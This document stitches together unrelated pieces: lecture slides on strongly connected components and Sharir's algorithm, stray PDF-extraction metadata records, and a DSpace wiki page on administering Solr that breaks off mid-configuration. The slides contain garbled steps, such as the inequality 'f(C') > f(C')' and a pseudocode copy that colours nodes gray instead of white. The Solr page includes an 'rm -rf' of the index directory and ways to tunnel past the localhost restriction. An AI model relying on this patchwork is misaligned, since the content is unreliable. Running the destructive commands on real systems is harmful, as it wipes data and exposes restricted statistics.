SCC. Component graph is a DAG! APPLICATIONS OF SCCs AND COMPONENT GRAPHS • Finding all cyclic dependencies in code • Can find single cycle with an easier DFS-based algorithm • But it is nicer to find all cycles at once, so you don’t have to fix one to expose another APPLICATIONS OF SCCs AND COMPONENT GRAPHS - **Data filtering** before running other algorithms - Consider Google maps; nodes = intersections, edges = roads - Don’t want to run path finding algorithm on the entire **global** graph! - First restrict execution to a rectangle - Then throw away everything except the (maximal) SCC containing source & target BRAINSTORMING AN ALGORITHM • What if we run DFS, then reverse all edges, then run DFS (like checking whether an entire graph is strongly connected?) This will definitely visit every node in a’s SCC And in fact it might visit other SCCs as well… <table> <thead> <tr> <th>DFSVisit(a)</th> <th>DFSVisit(h)</th> <th>DFSVisit(j)</th> </tr> </thead> </table> Showing discovery times Showing finish times What if we run DFS, then reverse all edges, then run DFS? We fail to identify SCC \{ h, i \} Problem: from h, we can reach other SCCs What if we perform DFSVisit calls in a different order? Other reachable SCCs should be visited first Then, each DFSVisit will visit exactly one SCC What if we DFS visit $H$ according to a topological order in $C_G$ (some edges to unfinished SCCs) In $C_H$: all edges to finished SCCs Consider **component graph** $C_G$ of $G$ (which we want to compute) **Idea:** in a DAG, reverse finish time would be a topological sort! *Yes!* We will prove this… $G$ might not be a DAG… but $C_G$ is! Does reverse finish order in $G$ give us a topological sort of $C_G$? **PROVING DECREASING FINISH TIMES INDUCE A TOPOLOGICAL ORDER ON THE COMPONENT GRAPH** - **Definition:** For a strongly connected component $C$, let $d[C] = \min\{d[v] : v \in C\}$ and $f[C] = \max\{f[v] : v \in C\}$ - **Lemma:** If $C_i, C_j$ are SCCs and there is an edge $C_i \rightarrow C_j$, then $f[C_i] > f[C_j]$ - **Proof.** Case 1 ($d[C_i] < d[C_j]$): - Let $u$ be the earliest discovered node in $C_i$ - All nodes in $C_i \cup C_j$ are white-reachable from $u$, so they are *descendants in the DFS forest* and finish before $u$ - So $f[C_i] > f[C_j]$ $u$ = earliest discovered node in here PROVING DECREASING FINISH TIMES INDUCE A TOPOLOGICAL ORDER ON THE COMPONENT GRAPH • **Definition:** For a strongly connected component $C$, let $d[C] = \min\{d[v] : v \in C\}$ and $f[C] = \max\{f[v] : v \in C\}$ • **Lemma:** if $C_i, C_j$ are SCCs and there is an edge $C_i \rightarrow C_j$, then $f[C_i] > f[C_j]$ • **Proof.** Case 2 ($d[C_i] > d[C_j]$): - Since component graph is a DAG, there is **no path** $C_j \rightarrow C_i$ - Thus, **no nodes** in $C_i$ are reachable from $C_j$ - So we discover $C_j$ and finish $C_j$ **without** discovering $C_i$ - Therefore $d[C_j] < f[C_j] < d[C_i] < f[C_i]$. QED CONSEQUENCE OF THE LEMMA • So, if we perform $DFSVisit(u)$ on nodes from **largest to smallest** finishing time, any **other SCCs** reachable from the current SCC must already be **finished/black** • So each $DFSVisit(u)$ call will **explore precisely one SCC** USING THE LEMMA TO BUILD AN ALGORITHM • Algorithm: • \((v_{i_1}, v_{i_2}, \ldots, v_{i_n}) := DFS\_topsort (G)\) • \(H := \text{construct by reversing each edge in } G\) • return := DFS\_SCC(H, (v_{i_1}, v_{i_2}, \ldots, v_{i_n})) This is called Sharir’s algorithm (sometimes Kosaraju’s algorithm). This paper first introduced it. Topological sort algorithm we saw earlier. Returns nodes ordered by finish time from largest to smallest. Calls DFSVisit on nodes in topological order, and gives each node an SCC number in a component[] array, which is then returned. Assume that \( f[v_{i_1}] > f[v_{i_2}] > \cdots > f[v_{i_n}] \). **Algorithm:** \( DFS(H, (v_{i_1}, v_{i_2}, ..., v_{i_n})) \) ```plaintext for j ← 1 to n do colour[v_{i_j}] ← white sec ← 0 for j ← 1 to n do if colour[v_{i_j}] = white then sec ← sec + 1 DFSvisit(H, v_{i_j}, sec) return (comp) ``` **Algorithm:** \( DFSvisit(H, v, sec) \) ```plaintext colour[v] ← gray comp[v] ← sec for each w ∈ Adj[v] do if colour[w] = white then DFSvisit(H, w, sec) colour[v] ← black ``` **PSEUDOCODE** Running Sharir’s Algorithm Phase 1: DFS topological sort Phase 2: DFSVisit reverse graph by reverse finish times DFSVisit(j) DFSVisit(h) DFSVisit(e) DFSVisit(a) $scc = 4$ $scc$ is shown PSEUDOCODE Assume that \( f[v_1] > f[v_2] > \cdots > f[v_n] \). **Algorithm:** \( DFS(H, (v_1, v_2, \ldots, v_n)) \) for \( j \leftarrow 1 \) to \( n \) do \( colour[v_i] \leftarrow \text{gray} \) \( \text{comp} \leftarrow 0 \) for \( j \leftarrow 1 \) to \( n \) do \( \) if \( \text{colour}[v_i] = \text{white} \) then \( \) \( \text{comp} \leftarrow \text{comp} + 1 \) \( DFSvisit(H, v_i, \text{comp}) \) return \( (\text{comp}) \) **Algorithm:** \( DFSvisit(H, v, \text{sec}) \) \( \text{colour}[v] \leftarrow \text{gray} \) \( \text{comp}[v] \leftarrow \text{sec} \) for each \( w \in \text{Adj}[v] \) do \( \) if \( \text{colour}[w] = \text{white} \) then \( DFSvisit(H, w, \text{sec}) \) \( \text{colour}[v] \leftarrow \text{black} \) Complexity? \( O(n + m) \) Proof of Correctness of Sharir’s Algorithm First, note that $G$ and $H$ have the same strongly connected components. Let $u = v_{i_1}$ be the first vertex visited in step 3. Let $C$ be the s.c.c. containing $u$ and let $C'$ be any other s.c.c. $f(C') > f(C')$, so there is no edge from $C'$ to $C$ in $G$ (by the Lemma). Therefore there is no edge from $C$ to $C'$ in $H$. Hence no vertex in $C'$ is reachable from $u$ in $H$. Therefore, $DFSvisit(u)$ explores the vertices in $C$ (and only those vertices); this forms one DFS tree in $H$. Next, $DFSvisit(v_{i_2})$ explores the vertices in the s.c.c. containing $v_{i_2}$, etc. Every time we make an initial call to $DFSvisit$, we are exploring a new s.c.c. We increment $scc$, which is used to label the various s.c.c. $comp[v]$ denotes the label of the s.c.c. containing $v$. I did not go through this slide in class, and you do not need to know it. But if you are curious, here is a proof for the algorithm. FREQUENTLY ASKED QUESTION Could we simply do the DFSVisit calls for the second DFS in the original graph G, in order from smallest to largest finishing time? DFSVisit(5) would reach two SCCs. No! Depends where first DFS starts… If first DFS starts at a, then…
{"Source-Url": "https://www.student.cs.uwaterloo.ca/~cs341/notes/t35brown/lec16.graphs_topsort_dagtest_scc.v2.pdf", "len_cl100k_base": 5764, "olmocr-version": "0.1.50", "pdf-total-pages": 44, "total-fallback-pages": 0, "total-input-tokens": 52822, "total-output-tokens": 7328, "length": "2e12", "weborganizer": {"__label__adult": 0.0003845691680908203, "__label__art_design": 0.0005574226379394531, "__label__crime_law": 0.0005884170532226562, "__label__education_jobs": 0.006526947021484375, "__label__entertainment": 0.00012743473052978516, "__label__fashion_beauty": 0.00022482872009277344, "__label__finance_business": 0.0002524852752685547, "__label__food_dining": 0.0005946159362792969, "__label__games": 0.001422882080078125, "__label__hardware": 0.0013141632080078125, "__label__health": 0.0007500648498535156, "__label__history": 0.0005230903625488281, "__label__home_hobbies": 0.00022923946380615232, "__label__industrial": 0.0007162094116210938, "__label__literature": 0.00046944618225097656, "__label__politics": 0.00037288665771484375, "__label__religion": 0.0005917549133300781, "__label__science_tech": 0.09552001953125, "__label__social_life": 0.00019216537475585935, "__label__software": 0.00826263427734375, "__label__software_dev": 0.87841796875, "__label__sports_fitness": 0.0005645751953125, "__label__transportation": 0.0009694099426269532, "__label__travel": 0.0003643035888671875}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 16975, 0.01229]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 16975, 0.46639]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 16975, 0.72626]], "google_gemma-3-12b-it_contains_pii": [[0, 208, false], [208, 352, null], [352, 557, null], [557, 1391, null], [1391, 1962, null], [1962, 2336, null], [2336, 2835, null], [2835, 2874, null], [2874, 2946, null], [2946, 3267, null], [3267, 3515, null], [3515, 3818, null], [3818, 4005, null], [4005, 4461, null], [4461, 4815, null], [4815, 5041, null], [5041, 5318, null], [5318, 6215, null], [6215, 6437, null], [6437, 7402, null], [7402, 7720, null], [7720, 8543, null], [8543, 9055, null], [9055, 9225, null], [9225, 9279, null], [9279, 9427, null], [9427, 9506, null], [9506, 10048, null], [10048, 10398, null], [10398, 10635, null], [10635, 10990, null], [10990, 11374, null], [11374, 11661, null], [11661, 12075, null], [12075, 12684, null], [12684, 13306, null], [13306, 13570, null], [13570, 14145, null], [14145, 14684, null], [14684, 14878, null], [14878, 15743, null], [15743, 16712, null], [16712, 16871, null], [16871, 16975, null]], "google_gemma-3-12b-it_is_public_document": [[0, 208, true], [208, 352, null], [352, 557, null], [557, 1391, null], [1391, 1962, null], [1962, 2336, null], [2336, 2835, null], [2835, 2874, null], [2874, 2946, null], [2946, 3267, null], [3267, 3515, null], [3515, 3818, null], [3818, 4005, null], [4005, 4461, null], [4461, 4815, null], [4815, 5041, null], [5041, 5318, null], [5318, 6215, null], [6215, 6437, null], [6437, 7402, null], [7402, 7720, null], [7720, 8543, null], [8543, 9055, null], [9055, 9225, null], [9225, 9279, null], [9279, 9427, null], [9427, 9506, null], [9506, 10048, null], [10048, 10398, null], [10398, 10635, null], [10635, 10990, null], [10990, 11374, null], [11374, 11661, null], [11661, 12075, null], [12075, 12684, null], [12684, 13306, null], [13306, 13570, null], [13570, 14145, null], [14145, 14684, null], [14684, 14878, null], [14878, 15743, null], [15743, 16712, null], [16712, 16871, null], [16871, 16975, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 16975, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 16975, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 16975, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 16975, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 16975, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 16975, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 16975, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 16975, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 16975, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 16975, null]], "pdf_page_numbers": [[0, 208, 1], [208, 352, 2], [352, 557, 3], [557, 1391, 4], [1391, 1962, 5], [1962, 2336, 6], [2336, 2835, 7], [2835, 2874, 8], [2874, 2946, 9], [2946, 3267, 10], [3267, 3515, 11], [3515, 3818, 12], [3818, 4005, 13], [4005, 4461, 14], [4461, 4815, 15], [4815, 5041, 16], [5041, 5318, 17], [5318, 6215, 18], [6215, 6437, 19], [6437, 7402, 20], [7402, 7720, 21], [7720, 8543, 22], [8543, 9055, 23], [9055, 9225, 24], [9225, 9279, 25], [9279, 9427, 26], [9427, 9506, 27], [9506, 10048, 28], [10048, 10398, 29], [10398, 10635, 30], [10635, 10990, 31], [10990, 11374, 32], [11374, 11661, 33], [11661, 12075, 34], [12075, 12684, 35], [12684, 13306, 36], [13306, 13570, 37], [13570, 14145, 38], [14145, 14684, 39], [14684, 14878, 40], [14878, 15743, 41], [15743, 16712, 42], [16712, 16871, 43], [16871, 16975, 44]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 16975, 0.07122]]}
olmocr_science_pdfs
2024-12-01
2024-12-01
3904bf1df0dda31d71ea1746f87833cab5fc2565
[REMOVED]
{"Source-Url": "https://iris.unito.it/retrieve/handle/2318/1659344/409520/autodasp.pdf", "len_cl100k_base": 5965, "olmocr-version": "0.1.53", "pdf-total-pages": 13, "total-fallback-pages": 0, "total-input-tokens": 30564, "total-output-tokens": 8237, "length": "2e12", "weborganizer": {"__label__adult": 0.0003552436828613281, "__label__art_design": 0.00033593177795410156, "__label__crime_law": 0.0003407001495361328, "__label__education_jobs": 0.00038504600524902344, "__label__entertainment": 9.131431579589844e-05, "__label__fashion_beauty": 0.00014901161193847656, "__label__finance_business": 0.0004000663757324219, "__label__food_dining": 0.0003919601440429687, "__label__games": 0.00058746337890625, "__label__hardware": 0.0011186599731445312, "__label__health": 0.0005450248718261719, "__label__history": 0.00025343894958496094, "__label__home_hobbies": 8.738040924072266e-05, "__label__industrial": 0.0004580020904541016, "__label__literature": 0.00023365020751953125, "__label__politics": 0.00030350685119628906, "__label__religion": 0.00042891502380371094, "__label__science_tech": 0.05059814453125, "__label__social_life": 8.851289749145508e-05, "__label__software": 0.0091094970703125, "__label__software_dev": 0.9326171875, "__label__sports_fitness": 0.0003120899200439453, "__label__transportation": 0.0005335807800292969, "__label__travel": 0.0002071857452392578}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 31658, 0.034]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 31658, 0.48047]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 31658, 0.86571]], "google_gemma-3-12b-it_contains_pii": [[0, 1010, false], [1010, 3618, null], [3618, 6719, null], [6719, 10052, null], [10052, 12688, null], [12688, 14701, null], [14701, 17550, null], [17550, 20769, null], [20769, 22587, null], [22587, 25299, null], [25299, 27875, null], [27875, 31403, null], [31403, 31658, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1010, true], [1010, 3618, null], [3618, 6719, null], [6719, 10052, null], [10052, 12688, null], [12688, 14701, null], [14701, 17550, null], [17550, 20769, null], [20769, 22587, null], [22587, 25299, null], [25299, 27875, null], [27875, 31403, null], [31403, 31658, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 31658, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 31658, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 31658, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 31658, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 31658, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 31658, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 31658, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 31658, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 31658, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 31658, null]], "pdf_page_numbers": [[0, 1010, 1], [1010, 3618, 2], [3618, 6719, 3], [6719, 10052, 4], [10052, 12688, 5], [12688, 14701, 6], [14701, 17550, 7], [17550, 20769, 8], [20769, 22587, 9], [22587, 25299, 10], [25299, 27875, 11], [27875, 31403, 12], [31403, 31658, 13]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 31658, 0.05147]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
58107b69925394122a3afe07e730650bea427f26
Solr - Solr in DSpace - Connecting to Solr - Bypassing localhost restriction temporarily - Instructions specific to Tomcat 7 and newer - Instructions specific to Tomcat 6 and older - Bypassing localhost restriction permanently - Accessing Solr - Solr cores - Solr admin interface - Solr queries - Solr responses - PHP example - Examples - Date of last deposited item - Top downloaded items by a specific user - Number of items in a specific community - Breakdown of submitted items per month - Statistics breakdown per event type - Statistics: breakdown of downloads per month - Statistics: number of downloads (item views) for a specific item per month - Statistics: number of total downloads in a given time span - Querying Solr from XMLUI - Examples - Date of last deposited item - Multicore join queries - "AND" search as default - Deleting Solr index data - Solr delete query - Manually delete Solr index files - Set up Solritas (VelocityResponseWriter) - Guidepost Solr in DSpace What is Solr: http://lucene.apache.org/solr/features.html DSpace uses Solr as a part of Discovery as index to speed up access to content metadata and data about access to DSpace (for statistics). It also provides faceting, search results filtering and in newer versions of DSpace also hit highlighting and "More like this". If Discovery is enabled, the DSpace search field accepts Solr search syntax. Discovery is an optional part of DSpace since 1.7 (with big improvements and configuration format changes in 1.8). When enabled, Discovery replaces DSpace Search and Browse and provides Solr-based statistics. Since DSpace 3, it is also the default storage for the DSpace OAI-PMH provider (server) responses. Please, note, that to get data from Solr, you do not technically need to enable the Discovery aspect, but you do need to populate the index. The statistics core is populated automatically in DSpace 1.6+. To populate the search core (DSpace 1.7+), you need to run [dspace]/bin/dspace index-discovery (you will probably want to schedule it in cron to run periodically, too). In DSpace versions older than 4.x, the command was called [dspace] /bin/dspace update-discovery-index. There should be no reason to access the oai core (DSpace 3.0), because it contains the same information as the search core, but if you want to populate it, run [dspace]/bin/dspace oai import. Connecting to Solr By default, the DSpace Solr server is configured to listen only on localhost, port 8080 (unless you specified another port in Tomcat configuration and the [dspace]/config/modules/discovery.cfg file). That means that you cannot connect from another machine to the dspace server port 8080 and request a Solr URL - you’ll get a HTTP 403 error. This configuration was done for security considerations - Solr index contains some data that is not accessible via public DSpace interfaces and some of the data might be sensitive. Before you try to follow the advice below to bypass the localhost restriction, please note: - Exposing the Solr interface means, that any restricted metadata such as `dc.description.provenance` and non-anonymized usage statistics (client IPs, user agent strings) will be accessible. - Exposing the Solr interface also means that it will be exposed for **write access**. There is no easy way to expose only read access. - Never expose Solr to the internet. If you're exposing it to an IP within your network, add it as an exception to the LocalHostRestrictionFilter. If you have to expose Solr to a public IP, use a SSH tunnel or a VPN for the connection. Bypassing localhost restriction temporarily While you could make Solr publicly accessible by changing this default configuration, this is not recommended, because Solr indexes may contain some data you might consider private. Instead, use one of following simple means to bypass this restriction temporarily. All of them will make Solr accessible only to the machine you're connecting from for as long as the connection is open. 1. **OpenSSH client - port forwarding** connect to DSpace server and forward its port 8080 to localhost (machine we're connecting from) port 1234 ```bash ssh -L 1234:127.0.0.1:8080 mydspace.edu ``` makes mydspace.edu:8080 accessible via localhost:1234 (type `http://localhost:1234` in browser address bar); also opens ssh shell exit ssh to terminate port forwarding Alternatively: ```bash ssh -N -f -L 1234:127.0.0.1:8080 mydspace.edu ``` run with `-N` and `-f` flags if you want ssh to go to background kill the ssh process to terminate port forwarding 2. **PuTTY client - port forwarding** Local port forwarding: ![PuTTY Configuration for Local Port Forwarding](image) Once you're connected in PuTTY, visit `http://localhost:1234/solr/` and you should see Solr's web interface. No browser configuration is necessary. Dynamic port forwarding/ SOCKS proxy*: ![PuTTY Configuration for Dynamic Port Forwarding](image) Once you're connected in PuTTY, you'll need to configure your browser to use localhost:1234 as a SOCKS proxy (and remove "localhost" and "127.0.0.1" from addresses to bypass this proxy - like in the next step) 3. **OpenSSH client - SOCKS proxy** connect to DSpace server and run a SOCKS proxy server on localhost port 1234; configure browser to use localhost:1234 as SOCKS proxy and remove "localhost" and "127.0.0.1" from addresses that bypass this proxy all browser requests now originate from dspace server (source IP is dspace server's IP) - dspace is the proxy server type `http://localhost:9080` in browser address bar - localhost here is the dspace server ```bash ssh -D 1234 mydspace.edu ``` *Note about Putty as SOCKS proxy - while it can be configured, it raises a security exception when Solr is accessed. If you figure this out, please add this method here. Bypassing localhost restriction permanently Privacy warning Before you read this chapter, make sure you read Connecting to Solr and understand the consequences of any changes. Instructions specific to Tomcat 7 and newer Here's how you can: 1. turn off the localhost filter in Tomcat 2. replace it with a RemoteAddrValve and allow an enumerated set of IP addresses or subnets (in the following example the 127.0.0.1, 123.123.123.123 IPs and the 111.222.233.* subnet would be allowed): Change your server.xml or alternatively your context fragment (i.e. conf/Catalina/localhost/solr.xml) like this: ``` <Context path="/solr" reloadable="true"> <Valve className="org.apache.catalina.valves.RemoteAddrValve" allow="127\.0\.0\.1|123\.123\.123\.123|111\.222\.233\.*"/> <Parameter name="LocalHostRestrictionFilter.localhost" value="false" override="false"/> </Context> ``` Do not forget to include localhost (i.e. 127.0.0.1) in the allowed list, otherwise Discovery, OAI 2.0 and other things depending on Solr won't work. See also: - Tomcat 7 documentation: Remote Address Filter - DS-1260 - Getting issue details... STATUS Instructions specific to Tomcat 6 and older Please, note that the syntax of the "allow" attribute changed in Tomcat 7 to a single regular expression. In Tomcat 6 and older, it was a comma-separated list of regular expressions, therefore this worked in Tomcat 6, but does not work in Tomcat 7+: ``` <Valve className="org.apache.catalina.valves.RemoteAddrValve" allow="111.222.233.*, 123.123.123.123, 127.0.0.1"/> ``` See also: Tomcat 6 documentation: Remote Address Filter Accessing Solr Solr cores DSpace contains a so-called multicore installation of Solr. That means that there are multiple Solr indexes and configurations sharing one Solr codebase. If you're familiar with Apache HTTPD, it is analogous to multiple virtual hosts running on one Apache server (separate configuration and webpages), except that individual Solr cores are accessible via different URL (as opposed to virtualhost IP:port). The two Solr instances in DSpace Discovery are called "search" and "statistics". search contains data about communities, collections, items and bitstreams. statistics contains data about searches, accessing users, IPs etc. The two instances are accessible at following URLs (relative to the dspace server): - http://localhost:8080/solr/search/ Solr admin interface Both Solr cores have separate administration interfaces which let you view their respective schemas, configurations, set up logging and submit queries. The schema browser here is very useful to list fields (and their types) included in each index and even see an overview of most common values of individual fields with their frequency. Solr queries The base URL of the default Solr search handler is as follows: http://localhost:8080/solr/search/search http://localhost:8080/solr/statistics/search Using the knowledge of particular fields from Solr Admin and Solr syntax (SolrQuerySyntax, CommonQueryParameters) you can make your own search requests. You can also read a brief tutorial to learn the query syntax quickly. You can also look at the solr log file (in older dspace versions, this was logged to catalina.out) to see queries generated by XMLUI in real time: ``` tail -f /dspace/log/solr.log ``` (depending on your OS, Tomcat installation method and logging settings, the path may be different) Solr responses By default, Solr responses are returned in XML format. However, Solr can provide several other output formats including JSON and CSV. Discovery uses the javabin format. The Solr request parameter is wt (e.g. &wt=json). For more information, see Response Writers, QueryResponseWriters. An interesting option is to specify an XSLT stylesheet that can transform the XML response (server-side) to any format you choose, typically HTML. Append &wt=xslt&tr=example.xsl to the Solr request URL. The .xsl files must be provided in the `/dspace/solr/search/conf/xslt/` directory. For more information, see XsltResponseWriter. **PHP example** ```php $solr_baseurl_dspace = "http://localhost:8080/solr/search/query?"; $solr_query = "test"; $solr_URL_dspace = $solr_baseurl_dspace."wt=phps&q=\urlencode($solr_query.* AND withdrawn:false); // use withdrawn:false with DSspace newer than 1.8 $response_dspace = file_get_contents($solr_URL_dspace, false, stream_context_create(array('http' => array('timeout' => 10)))); $result_dspace = unserialize($response_dspace); $num_dspace = $result_dspace['response']['numFound']; echo $num_dspace; ``` Keep in mind that although using the phps writer may be faster, it's not recommended for untrusted user data (see PHP unserialize() notes). Examples Date of last deposited item To get all items (search.resourceType:2) sorted by date accessioned (dc.date.accessioned_dt) in order from newest to oldest (desc; %20 is just an url-encoded space character): ``` http://localhost:8080/solr/search/select?q=search.resourceType:2&sort=dc.date.accessioned_dt%20desc ``` Note: <table> <thead> <tr> <th>search.resourceType:2</th> <th>items</th> </tr> </thead> <tbody> <tr> <td>search.resourceType:3</td> <td>communities</td> </tr> <tr> <td>search.resourceType:4</td> <td>collections</td> </tr> </tbody> </table> To get only the first (newest) item (rows=1) with all but the date accessioned field filtered out (fl=dc.date.accessioned) and without the Solr response header (omitHeader=true): Top downloaded items by a specific user Number of items in a specific community Note: <table> <thead> <tr> <th>facet.field</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>epersonid</td> <td>You want to group by epersonid, which is the user id</td> </tr> <tr> <td>type:0</td> <td>Interested in bitstreams only</td> </tr> </tbody> </table> Statistics breakdown per event type Statistics: breakdown of downloads per month Statistics: number of downloads (item views) for a specific item per month Statistics: number of total downloads in a given time span Querying Solr from XMLUI Since Solr returns its responses in XML, it's possible and easy to call custom Solr queries from XMLUI, process the XML response with XSLT and display the results in human-readable form on the HTML page. There are two ways how to do that - synchronously in Cocoon or asynchronously using AJAX (JavaScript) after the page is loaded. Solr queries are usually very fast, so only synchronous calls will be shown here. You can include another XML document to be processed by XSLT using the `document()` function. The parameter to this function is a string with the path to the XML document to process. This can be either a static .xml file stored on the server filesystem or a URL, which will be fetched at time of processing. For Solr, the latter is what we need. Furthermore, we need to distinguish templates for processing this external XML document as opposed to the input XML document. We'll do this using the `mode` attribute and define a different processing mode for each query. ```xml <xsl:apply-templates select="document('http://localhost:8080/solr/search/select?q=search.resourcetype:2&amp;sort=dc.date.accessioned_dt%20desc&amp;rows=1&amp;fl=dc.date.accessioned_dt&amp;omitHeader=true')") mode="solr-response"/> ``` Now we need to define a template with the same `mode` that matches elements contained in the Solr response XML: ```xml <xsl:template match="/response/result/doc/date" mode="solr-response"> Last item was imported: <xsl:value-of select="text()"/> </xsl:template> ``` Furthermore, we don’t want to hardcode the `http://localhost:8080` Solr URL, because this can be changed in config file and that would break the template. So we'll call a Java function from XSLT to retrieve the configured Solr URL. See the complete example in the next section. **Examples** **Date of last deposited item** For description of the query parameters, see [above](#). 1. Add the `confman` namespace and "confman" to exclude-result-prefixes. (For explanation, see how to [Call Java methods from XSLT (Manakin)](#). ```xml <xsl:stylesheet ... xmlns:confman="org.dspace.core.ConfigurationManager" exclude-result-prefixes="... confman"> ``` 2. Add this simple template to process the Solr query result. More complex date formatting can be done easily in XSLT 2.0 (see [XSLT 2.0 spec](#)), however Cocoon still uses XSLT 1.0 (see [DS-995](#)). It is currently also possible to call Java functions to do date formatting. ```xml <xsl:template match="/response/result/doc/date" mode="lastItem"> Last item was imported: <xsl:value-of select="substring(text(), 1, 10)"/> </xsl:template> ``` 3. Add the following code to the place where you want the resulting text to appear: ```xml <xsl:variable name="solr-search-url" select="confman:getProperty('discovery', 'search.server')"/> <xsl:apply-templates select="document(concat($solr-search-url, '/select?q=search.resourcetype:2&amp;sort=dc.date.accessioned_dt%20desc&amp;rows=1&amp;fl=dc.date.accessioned_dt&amp;omitHeader=true'))") mode="lastItem"/> ``` For example, to add it after the list of Recent items in Mirage, override its template like this: Multicore join queries Solr supports join queries across multiple cores since Solr 4.0. Thus it's also supported in DSpace 4.0 (which includes Solr 4.4). **Example query (not tested)** http://localhost:8080/solr/search/select/?q=*:*&fq={!join from=owningItem to=search.resourceid fromIndex=statistics}title:"Testing title" "AND" search as default Up to and including DSpace 5 (see DS-2809), Discovery uses the "OR" operator as default if you don't specify an operator between your query keywords. So searching for "John Doe" will also return entries like "Jane Doe" and "John Connor". If you want to change that, you have to edit the schema.xml file of the Solr search core: In [dspace]/solr/search/conf/schema.xml, find this line: ```xml <solrQueryParser defaultOperator="OR"/> ``` and change it to ```xml <solrQueryParser defaultOperator="AND"/> ``` Then restart your servlet container (Tomcat). **Warning** It's not officially recommended to change the defaultOperator setting. Some unrelated Discovery features might stop working if you do this. I haven't noticed anything wrong, but you might. If something breaks, make sure to notify us and we'll try to fix it or remove this tip. Deleting Solr index data If for whatever reason you need to delete the data in your index (which would normally be followed by running [dspace]/bin/dspace index-discovery (in DSpace versions older than 4.x, it was called [dspace]/bin/dspace update-discovery-index), but you can use the -b parameter instead to reindex everything), here's how you can do it: **Solr delete query** If Solr is running, you can access the following URL from the server where Solr is installed (remember the default localhost restriction): ``` </update>" ``` This will delete all documents in the **search** (Discovery) core. You can verify the number of documents in the core by running the following query and checking the value of the `numFound` attribute in the output: ``` $ curl "http://localhost:8080/solr/search/select/?q=*:*&rows=0" <?xml version="1.0" encoding="UTF-8"?> <response> <lst name="responseHeader"> <int name="status">0</int> <int name="QTime">5</int> <lst name="params"> <str name="rows">0</str> <str name="q">*:*</str> </lst> </lst> <result name="response"> <numFound>0</numFound> <start>0</start> </result> </response> ``` The URL listed in the examples is the default Solr URL in DSpace. If you changed it, you can find it in `search.server` in `[dspace]/config/modules/discovery.cfg` (DSpace 1.8+) or in `solr.log.server` in `[dspace]/config/dspace.cfg` (DSpace 1.7). Source: Solr Wiki FAQ: How can I delete all documents from my index? **Manually delete Solr index files** If your Solr is broken and you can’t issue queries, you can still delete the index files manually: ``` $ rm -rf [dspace]/solr/search/data/ ``` Then restart the servlet container or reload the `solr` webapp. See also: - Solr: How can I delete all documents from my index? - DSpace: deleted wrong directory **Set up Solritas (VelocityResponseWriter)** Solritas is a generic search interface on top of a Solr index. It can be useful if you want to explore the contents of a Solr index (core) using facets. To set it up in DSpace 3.0 (which uses Solr 3.5.0): - download `apache-solr-3.5.0.tgz` from [http://archive.apache.org/dist/lucene/solr/3.5.0/](http://archive.apache.org/dist/lucene/solr/3.5.0/) - `tar xvzf apache-solr-3.5.0.tgz` - `mkdir [dspace]/solr/lib` - `cp ./apache-solr-3.5.0/dist/apache-solr-velocity-3.5.0.jar [dspace]/solr/lib` - `cp ./apache-solr-3.5.0/contrib/velocity/lib/(commons-beanutils-1.7.0.jar, commons-collections-3.2.1.jar, velocity-1.6.4.jar,velocity-tools-2.0.jar) [dspace]/solr/lib` - `edit [dspace]/solr/solr.xml and add the sharedLib attribute: ```xml <solr persistent="false" sharedLib="lib"> ``` - `edit the solrconfig.xml file of each core where you want to use Solritas. Example for the "search" core: add the velocity ResponseWriter and requestHandler in [dspace]/solr/search/conf/solrconfig.xml:` <queryResponseWriter name="velocity" class="solr.VelocityResponseWriter"/> <requestHandler name="/browse" class="solr.SearchHandler"> <lst name="defaults"> <str name="v.template">browse</str> <str name="v.contentType">text/html;charset=UTF-8</str> <str name="title">Solritas</str> <str name="wt">velocity</str> <str name="defType">dismax</str> <str name="q.alt">*:*</str> <str name="rows">10</str> <str name="fl">*,score</str> <str name="facet">on</str> <str name="facet.field">title</str> <str name="facet.mincount">1</str> <str name="qf"> text^0.5 title^1.5 </str> </lst> <!--<lst name="invariants">--> <!--<str 